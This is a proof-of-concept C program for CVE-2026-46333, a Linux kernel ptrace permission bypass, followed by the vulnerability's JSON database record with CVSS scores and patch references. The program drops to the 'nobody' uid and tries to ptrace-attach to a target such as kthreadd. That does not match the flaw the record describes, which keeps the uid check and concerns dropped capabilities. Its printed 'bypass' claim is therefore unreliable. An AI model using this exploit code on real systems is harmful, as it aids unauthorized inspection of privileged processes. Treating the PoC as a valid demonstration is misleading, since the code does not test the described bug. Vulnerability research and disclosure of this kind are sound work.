CVE-2026-46333

/* * PoC for CVE-2026-46333: Linux Kernel ptrace Permission Bypass * This code attempts to ptrace a kernel thread (e.g., kthreadd) after * dropping privileges, demonstrating the bypass of the 'drop capabilities' * model due to the flawed 'get_dumpable()' logic. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/ptrace.h> #include <sys/types.h> #include <errno.h> int main(int argc, char *argv[]) { pid_t target_pid; if (argc < 2) { printf("Usage: %s <pid>\n", argv[0]); printf("Example: %s 2 (for kthreadd)\n", argv[0]); return 1; } target_pid = atoi(argv[1]); printf("[+] Attempting to ptrace attach to PID %d...\n", target_pid); // Simulate dropping privileges to demonstrate the bypass // Assuming the PoC is run as root initially to show the flaw if (getuid() == 0) { printf("[+] Running as root. Dropping privileges to 'nobody' (uid 65534)...\n"); if (setuid(65534) != 0) { perror("[-] setuid failed"); return 1; } } printf("[+] Current UID: %d\n", getuid()); // Attempt to attach to the target process if (ptrace(PTRACE_ATTACH, target_pid, NULL, NULL) == -1) { perror("[-] ptrace failed"); printf("[-] Access denied or error occurred.\n"); return 1; } printf("[+] SUCCESS: ptrace attach succeeded!\n"); printf("[+] This indicates a potential bypass of the capability check.\n"); // Detach ptrace(PTRACE_DETACH, target_pid, NULL, NULL); return 0; }

{"cve": {"id": "CVE-2026-46333", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-15T14:16:35.793", "lastModified": "2026-05-20T17:16:24.950", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nptrace: slightly saner 'get_dumpable()' logic\n\nThe 'dumpability' of a task is fundamentally about the memory image of\nthe task - the concept comes from whether it can core dump or not - and\nmakes no sense when you don't have an associated mm.\n\nAnd almost all users do in fact use it only for the case where the task\nhas a mm pointer.\n\nBut we have one odd special case: ptrace_may_access() uses 'dumpable' to\ncheck various other things entirely independently of the MM (typically\nexplicitly using flags like PTRACE_MODE_READ_FSCREDS). Including for\nthreads that no longer have a VM (and maybe never did, like most kernel\nthreads).\n\nIt's not what this flag was designed for, but it is what it is.\n\nThe ptrace code does check that the uid/gid matches, so you do have to\nbe uid-0 to see kernel thread details, but this means that the\ntraditional \"drop capabilities\" model doesn't make any difference for\nthis all.\n\nMake it all make a *bit* more sense by saying that if you don't have a\nMM pointer, we'll use a cached \"last dumpability\" flag if the thread\never had a MM (it will be zero for kernel threads since it is never\nset), and require a proper CAP_SYS_PTRACE capability to override."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://git.kernel.org/stable/c/01363cb3fbd0238ffdeb09f53e9039c9edf8a730", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/15b828a46f305ae9f05a7c16914b3ce273474205", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/2a93a4fac7b6051d3be7cd1b015fe7320cd0404d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/4709234fd1b95136ceb789f639b1e7ea5de1b181", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/6e5b51e74a40d377bcd3081dd33fbaa0e1aa7e3d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/8f907d345bae8f4b3f004c5abc56bf2dfb851ea7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/93d4ba49d18e3d7fb41a9927c2d0cca5e9dfefd6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/15/9", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00032.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00035.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}